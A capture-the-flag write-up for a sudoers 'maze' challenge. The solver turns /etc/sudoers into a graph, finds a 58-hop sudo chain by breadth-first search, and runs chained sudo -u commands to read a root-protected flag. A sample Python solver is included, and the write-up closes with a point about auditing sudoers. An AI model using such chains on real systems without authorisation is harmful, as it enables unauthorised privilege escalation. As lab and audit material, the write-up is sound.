Where am I? Who am I?
When we connect to the challenge, we get dropped into a shell as user u0. The goal is simple: read the flag at /home/user/flag.txt, but the file is owned by user u1000 with permissions 0400 (only the owner can read it).
The "maze" part comes from /etc/sudoers, which defines which users can sudo to which other users. Each user is like a node in a graph, and the sudo permissions are the edges. We need to find a path from u0 to u1000 by chaining sudo commands.
The challenge description mentions that the path was "computed from the shipped sudoers", but how do you actually discover it? There are two main approaches:
Since we had access to the sudoers file, we used an algorithmic approach:
1. Parse the sudoers file to build a graph representation:
   - A rule such as u123 ALL=(u456, u789) NOPASSWD: ALL means u123 can sudo to u456 and u789
   - For example, u0 ALL=(u499) NOPASSWD: ALL, meaning u0 can sudo to u499
2. Use graph traversal to find the path:
   - Search for a path from u0 to u1000
   - The traversal starts at u0, explores all users it can sudo to, then explores all users those users can sudo to, and so on until it reaches u1000
3. Build the sudo command chain:
   - The discovered path has 58 hops: u0 → u499 → u977 → u835 → u4 → u298 → ... → u1000
After discovering the path, we append cat /home/user/flag.txt and run:
sudo -u u499 sudo -u u977 sudo -u u835 ... sudo -u u1000 cat /home/user/flag.txt
It traverses all 58 user hops and we become u1000, which allows us to read the flag:
TSGCTF{Soooooooooooooo_many_users_in_this_server}
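The parse, traverse and build steps described above, as an added example that is not the solver used for the challenge. It assumes every rule has the form quoted in the writeup, uses breadth-first search as the traversal (an assumption that matches the layer-by-layer exploration described), and runs on a small constructed sudoers sample with target u6 instead of the shipped file:

```python
import re
from collections import deque

# Constructed sample in the rule format quoted above; not the challenge's file.
SAMPLE_SUDOERS = """\
u0 ALL=(u2) NOPASSWD: ALL
u2 ALL=(u1, u3) NOPASSWD: ALL
u1 ALL=(u0) NOPASSWD: ALL
u3 ALL=(u4, u5) NOPASSWD: ALL
u5 ALL=(u6) NOPASSWD: ALL
"""

RULE = re.compile(r"^(\w+)\s+ALL=\(([^)]*)\)\s+NOPASSWD:\s*ALL\s*$")

def parse_sudoers(text):
    """Return {user: [runas targets]} for rules of the form shown on the page."""
    graph = {}
    for line in text.splitlines():
        m = RULE.match(line.strip())
        if m:  # comments, blanks and other rule shapes are skipped
            targets = [t.strip() for t in m.group(2).split(",") if t.strip()]
            graph.setdefault(m.group(1), []).extend(targets)
    return graph

def find_path(graph, start, goal):
    """Breadth-first search; returns the shortest user chain or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        user = queue.popleft()
        if user == goal:
            path = []
            while user is not None:  # walk parent links back to the start
                path.append(user)
                user = parent[user]
            return path[::-1]
        for nxt in graph.get(user, []):
            if nxt not in parent:  # visited check also handles cycles
                parent[nxt] = user
                queue.append(nxt)
    return None

def build_command(path, command):
    """Chain one 'sudo -u <user>' per hop after the start, then the command."""
    return " ".join(f"sudo -u {u}" for u in path[1:]) + " " + command

if __name__ == "__main__":
    path = find_path(parse_sudoers(SAMPLE_SUDOERS), "u0", "u6")
    print(build_command(path, "cat /home/user/flag.txt"))
```

The same graph view works for reviewing a real sudoers file: any user with a path to a sensitive account effectively holds that account's privileges, even when no single rule grants them directly.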